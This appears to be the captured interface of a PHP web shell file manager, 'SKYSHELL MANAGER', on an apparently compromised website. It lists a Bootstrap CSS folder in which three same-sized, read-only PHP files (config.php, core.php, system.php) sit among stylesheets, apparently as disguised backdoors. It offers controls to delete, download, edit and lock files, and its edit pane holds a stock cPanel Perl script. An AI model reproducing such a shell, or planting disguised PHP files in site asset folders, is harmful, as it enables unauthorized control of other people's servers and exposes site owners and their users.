📁
SKYSHELL MANAGER-
🛒
PHP v7.4.33
Create Folder
Create File
Current Path:
home
/
oshofree
/
public_html
/
chbluxuryempire.com
/
academy
/
assets
/
vendor
/
bootstrap
/
css
/
Name
Size
Permissions
Actions
📁
..
-
0755
🗑️
🔒
📄
bootstrap-utilities.min.css.map
104.69 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-utilities.rtl.css
67.22 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-utilities.rtl.css.map
178.52 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-utilities.rtl.min.css
49.94 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-utilities.rtl.min.css.map
104.53 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap.css
191.25 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap.css.map
500.48 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap.min.css
151.98 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap.min.css.map
419.41 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap.rtl.css
190.55 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap.rtl.css.map
500.38 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap.rtl.min.css.map
617.97 KB
0644
🗑️
⬇️
✏️
🔒
📄
config.php
7.06 KB
0444
🗑️
⬇️
✏️
🔒
📄
core.php
7.06 KB
0444
🗑️
⬇️
✏️
🔒
📄
error_log
701.25 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-utilities.min.css
50.01 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-utilities.css
67.35 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-utilities.css.map
178.58 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-grid.rtl.min.css
50.37 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-grid.css
69.07 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-grid.css.map
185.87 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-grid.min.css
50.3 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-grid.min.css.map
113.07 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-grid.rtl.css
69.14 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-grid.rtl.css.map
185.87 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-grid.rtl.min.css.map
113.15 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-reboot.rtl.min.css.map
39.26 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-reboot.css
5.74 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-reboot.css.map
96.73 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-reboot.min.css
4.56 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-reboot.min.css.map
33.12 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-reboot.rtl.css
5.72 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-reboot.rtl.css.map
96.74 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-reboot.rtl.min.css
4.63 KB
0644
🗑️
⬇️
✏️
🔒
📄
system.php
7.06 KB
0444
🗑️
⬇️
✏️
🔒
Editing: magicloader
#!/usr/local/cpanel/3rdparty/bin/perl # cpanel - scripts/magicloader Copyright 2022 cPanel, L.L.C. # All rights reserved. # copyright@cpanel.net http://cpanel.net # This code is subject to the cPanel license. Unauthorized copying is prohibited use Cpanel::Config::LoadCpConf (); use Cpanel::ConfigFiles::Apache (); use Cpanel::LangMods (); my $apacheconf = Cpanel::ConfigFiles::Apache->new(); my $cpconf_ref = Cpanel::Config::LoadCpConf::loadcpconf(); my @LANGLIST = Cpanel::LangMods::langlist(); foreach my $lang (@LANGLIST) { if ( @ARGV && !grep( /^$lang$/, @ARGV ) ) { next(); } print "Configuring $lang magic...."; if ( $cpconf_ref->{ 'magicloader_' . $lang } ) { if ( Cpanel::LangMods::hasaction( $lang, 'enable_magic' ) ) { my ( $isok, $curstatus ) = Cpanel::LangMods::doaction( $lang, 'magic_status' ); if ( $curstatus ne '1' ) { my ( $ok, $result ) = Cpanel::LangMods::doaction( $lang, 'enable_magic' ); if ( $ok && $lang eq 'php-pear' ) { system qw(/usr/local/cpanel/scripts/ensure_vhost_includes --all-users --force-value=1 --only-check=cp_php_magic_include_path.conf --verbose); } } } print "On\n"; } else { if ( Cpanel::LangMods::hasaction( $lang, 'disable_magic' ) ) { my ( $isok, $curstatus ) = Cpanel::LangMods::doaction( $lang, 'magic_status' ); if ( $curstatus eq '1' ) { my ( $ok, $result ) = Cpanel::LangMods::doaction( $lang, 'disable_magic' ); if ( $ok && $lang eq 'php-pear' ) { system qw(/usr/local/cpanel/scripts/ensure_vhost_includes --all-users --force-value=0 --only-check=cp_php_magic_include_path.conf --verbose); } } } print "Off\n"; } }
💾 Save Changes